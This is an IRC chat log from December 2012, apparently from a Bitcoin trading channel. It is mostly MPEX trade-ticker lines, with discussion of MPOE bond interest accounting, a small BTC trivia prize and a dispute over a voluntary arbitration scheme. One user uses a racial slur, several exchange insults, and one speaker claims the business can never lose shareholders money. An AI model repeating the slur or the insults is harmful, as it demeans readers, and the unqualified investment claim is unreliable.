Dec 16 01:02:10 I think as mircea_popescu said, it'd be more like a contract settler Dec 16 01:02:47 I just need to be reasonably sure that it's not illegal for you to do ;) Dec 16 01:03:02 bbl Dec 16 01:05:43 mircea_popescu: would physical delivery be a stepping stone for a procurment market? Dec 16 01:07:06 i have no idea. irl futures rarely deliver Dec 16 01:07:09 but btc is often paradoxical. Dec 16 01:08:55 [MPEX] [S.MPOE] 2020 @ 0.00061732 = 1.247 BTC [-] Dec 16 01:08:56 [MPEX] [S.MPOE] 8100 @ 0.00061715 = 4.9989 BTC [-] Dec 16 01:08:58 [MPEX] [S.MPOE] 1850 @ 0.0006162 = 1.14 BTC [-] Dec 16 01:08:58 [MPEX] [S.MPOE] 15000 @ 0.00061574 = 9.2361 BTC [-] Dec 16 01:08:59 [MPEX] [S.MPOE] 21650 @ 0.00061533 = 13.3219 BTC [-] Dec 16 01:09:00 [MPEX] [S.MPOE] 3825 @ 0.00061469 = 2.3512 BTC [-] Dec 16 01:12:52 someone is selling lol Dec 16 01:14:28 mircea_popescu: what value do you see physical delivery bringing to btc? Dec 16 01:14:44 is it just because that's the way contracts were always done? Dec 16 01:15:20 [MPEX] [S.MPOE] 4321 @ 0.00062348 = 2.6941 BTC [+] Dec 16 01:15:21 [MPEX] [S.MPOE] 5755 @ 0.00062368 = 3.5893 BTC [+] Dec 16 01:15:37 it makes prices be provably fair Dec 16 01:15:50 othwise futures markets fail to work, as icbit is on the verge of proving Dec 16 01:17:32 :) Dec 16 01:19:13 [MPEX] [S.MPOE] 2000 @ 0.0006235 = 1.247 BTC [-] Dec 16 01:25:28 so flash contest : first to correctly identify the money in the clip gets 0.1337 btc. http://trilema.com/2010/portret-al-artistului-la-tinerete/ Dec 16 01:28:09 Venezuelan bolívar? Dec 16 01:28:12 mircea_popescu: chilean peso? Dec 16 01:28:17 nope Dec 16 01:28:31 mpoe lost money in october and november? Dec 16 01:28:39 thestringpuller: no? Dec 16 01:28:51 costa rica colon? Dec 16 01:28:56 hehe yeah. addy ? Dec 16 01:29:25 hum lemme find one Dec 16 01:29:46 look under bed Dec 16 01:29:50 it's where i always find mine Dec 16 01:29:50 1P9rQm6AfVXuzPtQf8B9pT4aeoPFAzKZ72 Dec 16 01:29:57 yeah Dec 16 01:30:00 it was behind it Dec 16 01:30:06 http://trilema.com/2012/mpoe-november-2012-statement/ Dec 16 01:30:27 thestringpuller the bot itself turning a profit and mpoe showing a profit are diff things Dec 16 01:30:32 due to the cost of capital involved. Dec 16 01:30:50 explain Dec 16 01:31:03 thestringpuller: basically, the bondholders took some of their own principal Dec 16 01:31:08 well, take nov. the bot made about 2k btc trading about 20k each way. Dec 16 01:31:25 but because it used ~40k btc to insure its trades and they ended up auctioned for like 9.9% Dec 16 01:31:35 it ended up paying 4k in interest, so mpoe showed a - Dec 16 01:32:48 who pys the 9.9 percent mpoe? Dec 16 01:32:52 yea Dec 16 01:33:01 so how is that a profit? Dec 16 01:33:06 there was a 2k loss Dec 16 01:33:12 everyone involved mad btc Dec 16 01:33:13 ... Dec 16 01:33:14 *made Dec 16 01:33:28 2k of principal was returned Dec 16 01:33:46 smickles i really have to come up with a better accounting scheme for this, it confuses EVERYBODY Dec 16 01:33:56 it really does Dec 16 01:34:31 out of 41252 btc's of bondholder money 1961 was lost Dec 16 01:34:44 mircea_popescu: if you capped the % to not return principle, it wouldn't show a loss Dec 16 01:34:53 but the bond rate made it so half of that wa returned Dec 16 01:35:03 [MPEX] [S.MPOE] 2321 @ 0.0006235 = 1.4471 BTC [-] Dec 16 01:35:03 [MPEX] [S.MPOE] 13795 @ 0.00062368 = 8.6037 BTC [+] Dec 16 01:35:10 thestringpuller see -pr's explanation to rassah https://bitcointalk.org/index.php?topic=124441.msg1386249#msg1386249 Dec 16 01:35:42 smickles yeah i guess, but for one i'd end up with having to round interests. Dec 16 01:38:15 mircea_popescu: or, you could but a line item in underneat the 'loss' line explaining that X of the loss was returned principle Dec 16 01:38:39 i suspect that'd make it more c onfusing. Dec 16 01:38:41 that way, unless there actually was a loss, the two would cancel each other out Dec 16 01:39:02 i think ima end up hiring free accounting support for random members of the public Dec 16 01:39:33 the mpoe-pr explanation is ridiculously clear Dec 16 01:39:38 by now mpex is obscure enough to warrant a fucking qualification Dec 16 01:39:39 so this makes much more sense Dec 16 01:39:42 like a 40 hour course Dec 16 01:39:48 heh Dec 16 01:39:54 thestringpuller she's gifted. Dec 16 01:41:01 in more areas than one (pun intended) Dec 16 01:41:16 mircea_popescu: i'm just suggesting to put the equivilant of this "1,961.31822035 BTC extra, which were also needed to pay the bondholders was actually taken out of their bonds" right under the -1`961.31822035 Dec 16 01:41:42 mayne as a footnote or something Dec 16 01:42:06 thestringpuller in many areas and some zones Dec 16 01:42:27 so the -1961 needed to pay out positions on the contracts Dec 16 01:42:32 that's taken from the bond Dec 16 01:43:29 its actually needed to pay interests Dec 16 01:43:59 so where does the profit come from? Dec 16 01:44:01 basically, bondholders asked for 9.9%. mpoe made enough to pay ~5%. the rest came out of their capital, as a sort of amortisation of a bizzare kind Dec 16 01:44:19 oh Dec 16 01:44:20 heh Dec 16 01:44:38 it's like, you lend 1k and say you want 10% a month. Dec 16 01:44:44 if the business makes enough to pay you 10% fine Dec 16 01:44:53 if not, it gives you back some of your capital. Dec 16 01:45:09 eventually you passively get all your capital back if the business sucks. Dec 16 01:45:32 but mpoe annually makes money? Dec 16 01:45:39 octoboer and november seemed like bad months Dec 16 01:45:56 well 1. you mean mpoe or the bot and 2. make money for whom ? Dec 16 01:46:14 for you the busiess Dec 16 01:46:26 that;d be the shareholders. Dec 16 01:46:31 yea Dec 16 01:46:35 it ALWAYS makes money for shareholders on the grounds it can never lose any. Dec 16 01:47:09 can the bondholders exit their bond position and get their entire principle back in a liquidation event? Dec 16 01:47:15 after settlements Dec 16 01:47:23 they can ask for their capital back at any point Dec 16 01:47:30 will receive it at the end of the current month. Dec 16 01:47:35 very effective model Dec 16 01:47:40 :) Dec 16 01:48:15 but ideally the bot needs to make money Dec 16 01:48:26 you are the pimp the bot is the hoe Dec 16 01:48:26 the bot itself only lost money two months out of 10 Dec 16 01:48:32 one was significant (august) Dec 16 01:48:37 the other was some pennies in june i think Dec 16 01:48:44 what about october/november Dec 16 01:48:55 in november it made like 2k Dec 16 01:49:04 in octomber i dun recall lets see Dec 16 01:49:26 oh Dec 16 01:49:27 i see Dec 16 01:49:28 jeeze Dec 16 01:49:31 i'm fucking dumb Dec 16 01:49:33 it's just confusing Dec 16 01:49:34 you're right in oct it lost like 25 btc Dec 16 01:49:51 [MPEX] [S.MPOE] 4321 @ 0.00063363 = 2.7379 BTC [+] Dec 16 01:49:53 [MPEX] [S.MPOE] 3078 @ 0.00063375 = 1.9507 BTC [+] Dec 16 01:49:54 [MPEX] [S.MPOE] 7001 @ 0.00063861 = 4.4709 BTC [+] Dec 16 01:49:59 ;;calc 1151.23669403-1129.93294445 Dec 16 01:49:59 21.30374958 Dec 16 01:50:08 to be precise. Dec 16 01:50:56 in november it made around 2k Dec 16 01:50:56 okay Dec 16 01:51:09 it's just the capital expenses that make it so tough Dec 16 01:51:11 9.9% Dec 16 01:51:12 geez Dec 16 01:51:22 was huge capital base too. Dec 16 01:51:33 the thing is see, if bot trades 20k contracts it matters A LOT Dec 16 01:51:39 if those are 2k open/close/open/close Dec 16 01:51:43 or 20k open then closed Dec 16 01:51:43 half of it was you though Dec 16 01:51:47 cause it needs a lot moar then Dec 16 01:52:46 but it seems like the bot is getting reemed on the capital expenses Dec 16 01:52:59 ;;ident smickles Dec 16 01:52:59 Nick 'smickles', with hostmask 'smickles!~smickles@mostofmany.com', is not identified. Dec 16 01:53:20 why are the capital expenses so high? Dec 16 01:53:26 thestringpuller well people can always put their btc in more bonds Dec 16 01:53:35 cause that's what bondholders ask for. its an auction model Dec 16 01:53:39 5-6% seems more reasonable for both parties... Dec 16 01:53:49 so the minimum asking was 9.9%? Dec 16 01:53:52 jeeze Dec 16 01:54:01 no, mpoe always pays max % accepted Dec 16 01:54:14 if someone puts 5k at 1%, someone else 2% at 3% and someone 100 btc at 25% Dec 16 01:54:19 oh Dec 16 01:54:21 and 7.1k are needed Dec 16 01:54:23 yea Dec 16 01:54:25 it will pay 25% on 7.1k Dec 16 01:54:29 [MPEX] [S.MPOE] 1664 @ 0.00063005 = 1.0484 BTC [-] Dec 16 01:54:38 because of that model the % was higher Dec 16 01:54:43 now I see what you see Dec 16 01:54:56 that amount of capital needed to trade drives up the price of capital expesnes Dec 16 01:55:00 expenses* Dec 16 01:55:01 yup Dec 16 01:55:23 and in any event, i don't think THE ENTIRE world of BTC paid 2k interest on deposits last month. Dec 16 01:55:36 so you know... MPOE is the financial center of lending by a fat margin. Dec 16 01:55:55 but the bot is getting lent money Dec 16 01:56:14 ya Dec 16 01:58:15 [MPEX] [S.MPOE] 17588 @ 0.00063861 = 11.2319 BTC [+] Dec 16 02:02:07 [MPEX] [S.MPOE] 3361 @ 0.00063861 = 2.1464 BTC [+] Dec 16 02:02:09 [MPEX] [S.MPOE] 23850 @ 0.00063864 = 15.2316 BTC [+] Dec 16 02:02:09 [MPEX] [S.MPOE] 989 @ 0.00063925 = 0.6322 BTC [+] Dec 16 02:07:58 ;;ident Dec 16 02:07:58 You are not identified. Dec 16 02:08:00 :o Dec 16 02:08:42 ;;ident Dec 16 02:08:42 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Dec 16 02:10:38 [MPEX] [S.MPOE] 5011 @ 0.00063925 = 3.2033 BTC [+] Dec 16 02:10:39 [MPEX] [S.MPOE] 6267 @ 0.00063949 = 4.0077 BTC [+] Dec 16 02:10:40 [MPEX] [S.MPOE] 2622 @ 0.00063995 = 1.6779 BTC [+] Dec 16 02:13:50 ;;ident smickles Dec 16 02:13:51 Nick 'smickles', with hostmask 'smickles!~smickles@mostofmany.com', is identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Dec 16 02:20:03 [MPEX] [S.MPOE] 5600 @ 0.0006337 = 3.5487 BTC [-] Dec 16 02:20:04 [MPEX] [S.MPOE] 2657 @ 0.00063005 = 1.674 BTC [-] Dec 16 02:20:06 [MPEX] [S.MPOE] 3393 @ 0.00062981 = 2.1369 BTC [-] Dec 16 02:22:30 [MPEX] [S.MPOE] 20650 @ 0.00062981 = 13.0056 BTC [-] Dec 16 02:23:03 ;;rate mircea_popescu -10 FUCKIN SCAMMER!!! Has MILKed me for over 0.1336 BTC!! PROOF!! Dec 16 02:23:04 Rating entry successful. Your rating for user mircea_popescu has changed from 2 to -10. Dec 16 02:23:29 where's your address! Dec 16 02:23:34 i gave it to you Dec 16 02:23:38 eh! Dec 16 02:23:44 00:29.46 ( mircea_popescu ) look under bed Dec 16 02:23:44 00:29.49 ( kakobrekla ) 1P9rQm6AfVXuzPtQf8B9pT4aeoPFAzKZ72 Dec 16 02:23:44 00:29.49 ( mircea_popescu ) it's where i always find mine Dec 16 02:23:44 where1 Dec 16 02:23:52 duh Dec 16 02:23:52 between the lines Dec 16 02:24:08 [MPEX] [S.MPOE] 4594 @ 0.00062981 = 2.8933 BTC [-] Dec 16 02:24:10 [MPEX] [S.MPOE] 11000 @ 0.00062725 = 6.8998 BTC [-] Dec 16 02:24:11 [MPEX] [S.MPOE] 6656 @ 0.00062505 = 4.1603 BTC [-] Dec 16 02:24:28 twas 1337. Dec 16 02:24:28 sent you 1336 mBTC. YOU CAN SUE ME FOR THE OTHER ONE Dec 16 02:24:37 MOTHERFUCK Dec 16 02:24:41 mwahahahaha Dec 16 02:24:45 and so empires are built! Dec 16 02:26:03 in other news, icbit.se paid out. Dec 16 02:26:19 a cool ~300 btc in profits. Dec 16 02:27:40 kakobrekla : in exchange for your milk i offer you cowsies. http://polimedia.us/dtng/c/src/135561763837.jpg Dec 16 02:28:43 alright, outweight the missing 0.074% of the settelment payment Dec 16 02:28:53 ;;rate mircea_popescu 3 made good on the deeds. Dec 16 02:28:54 Rating entry successful. Your rating for user mircea_popescu has changed from -10 to 3. Dec 16 02:29:12 [MPEX] [S.MPOE] 3628 @ 0.00063989 = 2.3215 BTC [+] Dec 16 02:29:21 wtf 63.9 Dec 16 02:30:45 [MPEX] [S.MPOE] 12517 @ 0.00063546 = 7.9541 BTC [-] Dec 16 02:30:55 http://www.bitmit.net/en/item/7548-intel-pentium-4-3-00ghz-cpu-processors Dec 16 02:31:03 is this for real ? pentium 4 buy now .3 btc ? Dec 16 02:32:36 perhaps for the whole lot Dec 16 02:33:43 what do you mean whole lot ? Dec 16 02:34:01 >> I have 9 of them available Dec 16 02:34:17 but i mean... a pentium 4 is worth more than 5 bux no ?! Dec 16 02:34:23 no Dec 16 02:34:39 wow srsly ? Dec 16 02:35:11 preetymuch ya Dec 16 02:35:42 i guess they woulsdn't be prescotts Dec 16 02:37:13 noone wants that Dec 16 02:37:21 even c2d are for the low end boxes Dec 16 02:37:25 these days Dec 16 02:41:10 [MPEX] [S.MPOE] 16894 @ 0.00062505 = 10.5596 BTC [-] Dec 16 02:56:13 [MPEX] [S.MPOE] 4003 @ 0.00062182 = 2.4891 BTC [-] Dec 16 02:57:03 lolz https://bitcointalk.org/index.php?topic=130989.msg1402197#msg1402197 Dec 16 02:57:18 i didnt see prs comment till now Dec 16 02:59:05 [MPEX] [S.DICE] 1000 @ 0.00335 = 3.35 BTC [-] Dec 16 02:59:06 [MPEX] [S.DICE] 2250 @ 0.0033341 = 7.5017 BTC [-] Dec 16 03:03:58 [MPEX] [S.MPOE] 19643 @ 0.00062573 = 12.2912 BTC [+] Dec 16 03:03:58 [MPEX] [S.MPOE] 8894 @ 0.00062696 = 5.5762 BTC [+] Dec 16 03:04:00 [MPEX] [S.MPOE] 13200 @ 0.00063278 = 8.3527 BTC [+] Dec 16 03:04:01 [MPEX] [S.MPOE] 9663 @ 0.00063428 = 6.129 BTC [+] Dec 16 03:05:36 sooo Dec 16 03:05:44 the december judges : http://trilema.com/2012/the-first-roll-of-judges-december-2012/ Dec 16 03:05:51 anyone wanting to sue may do so now. Dec 16 03:06:08 and also rota stuff can be followed in its own category http://trilema.com/category/rota/ Dec 16 03:06:27 kakobrekla ahaha Dec 16 03:06:47 get him to transcribe that youtube Dec 16 03:06:52 from amir or whats that guy Dec 16 03:07:46 to see if it was a fair transcription the first time Dec 16 03:08:39 lol Dec 16 03:12:59 i never just read forum posts Dec 16 03:13:04 these people are really dumb Dec 16 03:13:24 the debate between mpoe-pr and inaba (sp?) is really dumb Dec 16 03:13:27 [MPEX] [S.DICE] 993 @ 0.0033341 = 3.3108 BTC [-] Dec 16 03:18:31 [MPEX] [S.MPOE] 10300 @ 0.00062354 = 6.4225 BTC [-] Dec 16 03:21:26 ;;ticker Dec 16 03:21:26 BTCUSD ticker | Best bid: 13.55130, Best ask: 13.55131, Bid-ask spread: 0.00001, Last trade: 13.55130, 24 hour volume: 15218.16247989, 24 hour low: 13.44216, 24 hour high: 13.66548, 24 hour vwap: 13.54337 Dec 16 03:22:10 [MPEX] [S.DICE] 1200 @ 0.0034 = 4.08 BTC [+] Dec 16 03:34:47 [MPEX] [S.MPOE] 8600 @ 0.00063009 = 5.4188 BTC [+] Dec 16 03:34:49 [MPEX] [S.MPOE] 8800 @ 0.0006315 = 5.5572 BTC [+] Dec 16 03:40:41 [MPEX] [S.DICE] 2450 @ 0.00337621 = 8.2717 BTC [-] Dec 16 03:44:29 [MPEX] [S.MPOE] 2000 @ 0.000624 = 1.248 BTC [-] Dec 16 03:44:30 [MPEX] [S.MPOE] 1797 @ 0.00062354 = 1.1205 BTC [-] Dec 16 03:44:32 [MPEX] [S.MPOE] 4550 @ 0.00062282 = 2.8338 BTC [-] Dec 16 03:44:32 [MPEX] [S.MPOE] 5476 @ 0.00062111 = 3.4012 BTC [-] Dec 16 03:52:40 [MPEX] [S.DICE] 570 @ 0.00334008 = 1.9038 BTC [-] Dec 16 03:56:13 [MPEX] [S.MPOE] 4321 @ 0.00062135 = 2.6849 BTC [+] Dec 16 03:56:14 [MPEX] [S.MPOE] 4724 @ 0.00062111 = 2.9341 BTC [-] Dec 16 03:56:15 [MPEX] [S.MPOE] 3489 @ 0.00062082 = 2.166 BTC [-] Dec 16 03:56:16 [MPEX] [S.MPOE] 7250 @ 0.00062033 = 4.4974 BTC [-] Dec 16 03:56:17 [MPEX] [S.MPOE] 2966 @ 0.0006161 = 1.8274 BTC [-] Dec 16 03:58:48 look at these niggas sellin there shares Dec 16 04:02:38 What? Would it be going in the other direction than the strings you're pulling? Dec 16 04:06:13 later all. **** BEGIN LOGGING AT Sun Dec 16 08:50:35 2012 Dec 16 08:53:10 [MPEX] [S.MPOE] 4321 @ 0.00062268 = 2.6906 BTC [+] Dec 16 08:53:11 [MPEX] [S.MPOE] 169 @ 0.0006226 = 0.1052 BTC [-] Dec 16 08:53:13 [MPEX] [S.MPOE] 4960 @ 0.00061958 = 3.0731 BTC [-] Dec 16 08:54:35 [MPEX] [S.DICE] 3300 @ 0.0034 = 11.22 BTC [+] Dec 16 08:56:21 [MPEX] [S.MPOE] 4321 @ 0.0006306 = 2.7248 BTC [+] Dec 16 08:56:22 [MPEX] [S.MPOE] 2474 @ 0.00063083 = 1.5607 BTC [+] Dec 16 08:59:21 [MPEX] [S.MPOE] 3355 @ 0.00063293 = 2.1235 BTC [+] Dec 16 09:30:07 [MPEX] [S.MPOE] 4321 @ 0.00062828 = 2.7148 BTC [-] Dec 16 09:30:09 [MPEX] [S.MPOE] 7079 @ 0.00062841 = 4.4485 BTC [+] Dec 16 09:35:56 [MPEX] [S.MPOE] 16835 @ 0.00062841 = 10.5793 BTC [+] Dec 16 09:35:58 [MPEX] [S.MPOE] 6165 @ 0.00062952 = 3.881 BTC [+] Dec 16 09:51:31 [MPEX] [S.MPOE] 10027 @ 0.00062469 = 6.2638 BTC [-] Dec 16 09:51:33 [MPEX] [S.MPOE] 4321 @ 0.00062257 = 2.6901 BTC [-] Dec 16 09:51:34 [MPEX] [S.MPOE] 1802 @ 0.00062222 = 1.1212 BTC [-] Dec 16 10:15:29 [MPEX] [S.MPOE] 4321 @ 0.00062252 = 2.6899 BTC [+] Dec 16 10:15:30 [MPEX] [S.MPOE] 24779 @ 0.00062222 = 15.418 BTC [-] Dec 16 10:25:48 [MPEX] [S.MPOE] 4321 @ 0.00062333 = 2.6934 BTC [+] Dec 16 10:25:50 [MPEX] [S.MPOE] 629 @ 0.00062364 = 0.3923 BTC [+] Dec 16 10:29:32 ;;calc 319 * 0.01302041 Dec 16 10:29:32 4.15351079 **** BEGIN LOGGING AT Sun Dec 16 11:04:43 2012 Dec 16 11:09:27 [MPEX] [S.MPOE] 12005 @ 0.00061958 = 7.4381 BTC [-] Dec 16 11:09:29 [MPEX] [S.MPOE] 745 @ 0.0006194 = 0.4615 BTC [-] Dec 16 11:10:35 [MPEX] [S.MPOE] 8655 @ 0.0006194 = 5.3609 BTC [-] Dec 16 11:10:36 [MPEX] [S.MPOE] 4071 @ 0.00061301 = 2.4956 BTC [-] Dec 16 11:17:49 [MPEX] [S.MPOE] 5748 @ 0.00061301 = 3.5236 BTC [-] Dec 16 11:17:50 [MPEX] [S.MPOE] 914 @ 0.00061254 = 0.5599 BTC [-] Dec 16 11:17:52 [MPEX] [S.MPOE] 9538 @ 0.00061202 = 5.8374 BTC [-] Dec 16 11:24:41 [MPEX] [S.MPOE] 23500 @ 0.00061667 = 14.4917 BTC [+] **** ENDING LOGGING AT Sun Dec 16 11:50:24 2012 **** BEGIN LOGGING AT Sun Dec 16 11:59:26 2012 Dec 16 11:59:54 [MPEX] [S.DICE] 1600 @ 0.0034 = 5.44 BTC [+] Dec 16 12:00:47 0,o Dec 16 12:00:55 I hope you reset your passwd after that :P Dec 16 12:01:34 :D Dec 16 12:02:02 finished setting up the stuff for terra Dec 16 12:02:02 was due for a reset anyway, it's been over a year. Dec 16 12:02:18 working on another little something thats like a 10min peice of code Dec 16 12:02:21 o also, : this http://trilema.com/2012/mpex-accounts-spring-scrub-2013/ Dec 16 12:02:36 LIES Dec 16 12:02:40 iz not spring 2013 yet Dec 16 12:02:48 go away future boy! Dec 16 12:02:48 :P Dec 16 12:03:03 lol Dec 16 12:03:18 and also, the MPEx Rota is a go, people can now sue. Dec 16 12:03:57 you need to specify damages. how sick ? Dec 16 12:04:02 hmm Dec 16 12:04:14 vomiting, ER visits... high blood pressure, stress... Dec 16 12:04:26 occasional diarea of the mouth Dec 16 12:04:28 >:P Dec 16 12:05:19 that's like... half a btc Dec 16 12:08:32 [MPEX] [S.MPOE] 3871 @ 0.00061942 = 2.3978 BTC [+] Dec 16 12:08:33 [MPEX] [S.MPOE] 2893 @ 0.00062072 = 1.7957 BTC [+] Dec 16 12:12:23 [MPEX] [S.MPOE] 4150 @ 0.00061709 = 2.5609 BTC [-] Dec 16 12:18:16 [MPEX] [S.MPOE] 4321 @ 0.00061291 = 2.6484 BTC [-] Dec 16 12:18:17 [MPEX] [S.MPOE] 5132 @ 0.00061274 = 3.1446 BTC [-] Dec 16 12:22:16 [MPEX] [S.MPOE] 4321 @ 0.00061573 = 2.6606 BTC [+] Dec 16 12:22:17 [MPEX] [S.MPOE] 9150 @ 0.00061601 = 5.6365 BTC [+] Dec 16 12:22:18 [MPEX] [S.MPOE] 7079 @ 0.00062072 = 4.3941 BTC [+] Dec 16 12:34:44 [MPEX] [S.MPOE] 9903 @ 0.00062072 = 6.147 BTC [+] Dec 16 12:34:44 [MPEX] [S.MPOE] 9097 @ 0.00062364 = 5.6733 BTC [+] Dec 16 12:50:11 [MPEX] [S.MPOE] 18100 @ 0.00061659 = 11.1603 BTC [-] Dec 16 12:50:12 [MPEX] [S.MPOE] 10393 @ 0.00061274 = 6.3682 BTC [-] Dec 16 12:53:55 [MPEX] [S.DICE] 1400 @ 0.00337085 = 4.7192 BTC [-] Dec 16 12:54:06 mircea_popescu: how is this rota thingy going to enforce anything? Dec 16 12:54:21 voluntarily. Dec 16 12:54:49 and the point of the whole thing is? Dec 16 12:55:07 you know, same as bitcoin. Dec 16 12:55:19 doing things the right way. Dec 16 12:55:24 no, I do not know. Enlighten me Dec 16 12:56:20 well, the problem with "enforcing" is that it takes effort. X does something stupid and now Y has to drop whatever he's doing, expend time and energy FORCING X to do the right thing ? Dec 16 12:56:26 why bother. Dec 16 12:56:41 you just eliminate X, case closed. Dec 16 12:57:59 so what you just said is that rota thingy is pointless Dec 16 12:58:20 nope. Dec 16 12:58:27 [MPEX] [S.MPOE] 4321 @ 0.00062333 = 2.6934 BTC [+] Dec 16 12:58:27 not anymore than bitcoin is pointless. Dec 16 12:58:28 [MPEX] [S.MPOE] 14033 @ 0.00062364 = 8.7515 BTC [+] Dec 16 12:58:29 [MPEX] [S.MPOE] 2796 @ 0.00062381 = 1.7442 BTC [+] Dec 16 12:59:04 no, this hyperbole bull shit is not working on me :) Dec 16 12:59:44 [MPEX] [S.MPOE] 4321 @ 0.00062352 = 2.6942 BTC [-] Dec 16 12:59:45 [MPEX] [S.MPOE] 7192 @ 0.00062381 = 4.4864 BTC [+] Dec 16 13:00:36 you're not very well equipped to think, is the problem. but otherwise, hey. Dec 16 13:00:45 knock yourself out. Dec 16 13:01:33 LOL, look who's talking Dec 16 13:02:00 you can not even explain your own idea the ... wtf Dec 16 13:02:09 you have the problem with thinking :) Dec 16 13:04:05 mircea_popescu, more substance, less opinions ;) Dec 16 13:04:54 EskimoBob: you seem up early :P Dec 16 13:04:55 or what ever you so pompously stated Dec 16 13:05:04 I am :( Dec 16 13:08:25 couldnt sleep? too excited over the asset? :) Dec 16 13:09:01 :) Dec 16 13:19:08 [MPEX] [S.MPOE] 6869 @ 0.00062348 = 4.2827 BTC [-] Dec 16 13:25:00 [MPEX] [S.MPOE] 7981 @ 0.00062348 = 4.976 BTC [-] Dec 16 13:25:00 [MPEX] [S.MPOE] 5394 @ 0.00061274 = 3.3051 BTC [-] Dec 16 13:25:02 [MPEX] [S.MPOE] 225 @ 0.00061206 = 0.1377 BTC [-] Dec 16 13:31:17 [MPEX] [S.MPOE] 4321 @ 0.00061233 = 2.6459 BTC [+] Dec 16 13:31:19 [MPEX] [S.MPOE] 14075 @ 0.00061206 = 8.6147 BTC [-] Dec 16 13:31:20 [MPEX] [S.MPOE] 7354 @ 0.00061202 = 4.5008 BTC [-] Dec 16 13:35:02 [MPEX] [S.MPOE] 4321 @ 0.00061229 = 2.6457 BTC [+] Dec 16 13:35:04 [MPEX] [S.MPOE] 35091 @ 0.00061202 = 21.4764 BTC [-] Dec 16 13:42:33 [MPEX] [S.MPOE] 4321 @ 0.00061207 = 2.6448 BTC [+] Dec 16 13:42:34 [MPEX] [S.MPOE] 11779 @ 0.00061202 = 7.209 BTC [-] Dec 16 13:45:07 [MPEX] [S.MPOE] 1500 @ 0.00061425 = 0.9214 BTC [+] Dec 16 13:45:39 [MPEX] [S.MPOE] 3438 @ 0.00061202 = 2.1041 BTC [-] Dec 16 13:45:41 [MPEX] [S.MPOE] 1100 @ 0.00061134 = 0.6725 BTC [-] Dec 16 13:45:42 [MPEX] [S.MPOE] 19662 @ 0.00061083 = 12.0101 BTC [-] Dec 16 13:46:28 [MPEX] [S.MPOE] 2821 @ 0.00061425 = 1.7328 BTC [+] Dec 16 13:46:29 [MPEX] [S.MPOE] 9300 @ 0.0006144 = 5.7139 BTC [+] Dec 16 13:46:31 [MPEX] [S.MPOE] 10650 @ 0.00062041 = 6.6074 BTC [+] Dec 16 13:46:31 [MPEX] [S.MPOE] 1629 @ 0.00062381 = 1.0162 BTC [+] Dec 16 14:03:29 [MPEX] [S.MPOE] 15000 @ 0.00062271 = 9.3407 BTC [-] Dec 16 14:03:30 [MPEX] [S.MPOE] 8289 @ 0.00061962 = 5.136 BTC [-] Dec 16 14:03:31 [MPEX] [S.MPOE] 18576 @ 0.00061083 = 11.3468 BTC [-] Dec 16 14:07:59 [MPEX] [S.MPOE] 4321 @ 0.00061103 = 2.6403 BTC [+] Dec 16 14:08:02 [MPEX] [S.MPOE] 7979 @ 0.00061083 = 4.8738 BTC [-] Dec 16 14:28:58 [MPEX] [X.AWHG] 220 @ 0.06231503 = 13.7093 BTC [-] Dec 16 14:29:00 [MPEX] [X.ENGG] 230 @ 0.2576593 = 59.2616 BTC [-] Dec 16 14:30:35 [MPEX] [S.MPOE] 6033 @ 0.00061083 = 3.6851 BTC [-] Dec 16 14:30:36 [MPEX] [S.MPOE] 19750 @ 0.00061077 = 12.0627 BTC [-] Dec 16 14:30:37 [MPEX] [S.MPOE] 3617 @ 0.00060993 = 2.2061 BTC [-] Dec 16 14:36:14 [MPEX] [S.MPOE] 6433 @ 0.00060993 = 3.9237 BTC [-] Dec 16 14:36:16 [MPEX] [S.MPOE] 9517 @ 0.00060927 = 5.7984 BTC [-] Dec 16 15:09:49 [MPEX] [S.MPOE] 4321 @ 0.00061734 = 2.6675 BTC [+] Dec 16 15:09:50 [MPEX] [S.MPOE] 429 @ 0.00061762 = 0.265 BTC [+] Dec 16 15:18:10 [MPEX] [S.MPOE] 4321 @ 0.00061728 = 2.6673 BTC [-] Dec 16 15:18:11 [MPEX] [S.MPOE] 3465 @ 0.00061762 = 2.1401 BTC [+] Dec 16 15:19:40 [MPEX] [S.MPOE] 4321 @ 0.0006175 = 2.6682 BTC [-] Dec 16 15:19:41 [MPEX] [S.MPOE] 2256 @ 0.00061762 = 1.3934 BTC [+] Dec 16 15:19:43 [MPEX] [S.MPOE] 13523 @ 0.00061951 = 8.3776 BTC [+] Dec 16 15:21:10 [MPEX] [S.DICE] 100 @ 0.00337085 = 0.3371 BTC [-] Dec 16 15:21:11 [MPEX] [S.DICE] 315 @ 0.00334008 = 1.0521 BTC [-] Dec 16 15:21:13 [MPEX] [S.DICE] 1535 @ 0.0033341 = 5.1178 BTC [-] Dec 16 15:27:18 [MPEX] [S.MPOE] 3727 @ 0.00061951 = 2.3089 BTC [+] Dec 16 15:27:19 [MPEX] [S.MPOE] 2564 @ 0.00062381 = 1.5994 BTC [+] Dec 16 15:27:21 [MPEX] [S.MPOE] 2009 @ 0.00062388 = 1.2534 BTC [+] Dec 16 15:36:06 [MPEX] [S.MPOE] 2750 @ 0.00062388 = 1.7157 BTC [+] Dec 16 15:44:34 http://imgur.com/r/aww/TZ4Nc Dec 16 15:49:02 [MPEX] [S.MPOE] 4321 @ 0.00061407 = 2.6534 BTC [-] Dec 16 15:49:04 [MPEX] [S.MPOE] 11279 @ 0.000614 = 6.9253 BTC [-] Dec 16 15:51:33 seen it Dec 16 15:51:34 awwed Dec 16 15:52:19 im new. Dec 16 15:59:12 http://www.writersofthefuture.com/time-capsule-predictions how about that Dec 16 16:06:39 [MPEX] [S.MPOE] 23700 @ 0.0006206 = 14.7082 BTC [+] Dec 16 16:11:34 [MPEX] [S.MPOE] 2459 @ 0.0006206 = 1.5261 BTC [+] Dec 16 16:11:35 [MPEX] [S.MPOE] 6271 @ 0.000614 = 3.8504 BTC [-] Dec 16 16:11:37 [MPEX] [S.MPOE] 8177 @ 0.00061293 = 5.0119 BTC [-] Dec 16 16:13:08 mircea_popescu: what else does btc need to win the war on fiat? Dec 16 16:13:22 take over locs. Dec 16 16:14:26 don't locs break anonyminity Dec 16 16:14:38 well they don't have to wth the PGP Contract Dec 16 16:15:07 [MPEX] [S.MPOE] 4321 @ 0.00062353 = 2.6943 BTC [+] Dec 16 16:15:08 [MPEX] [S.MPOE] 5641 @ 0.00062388 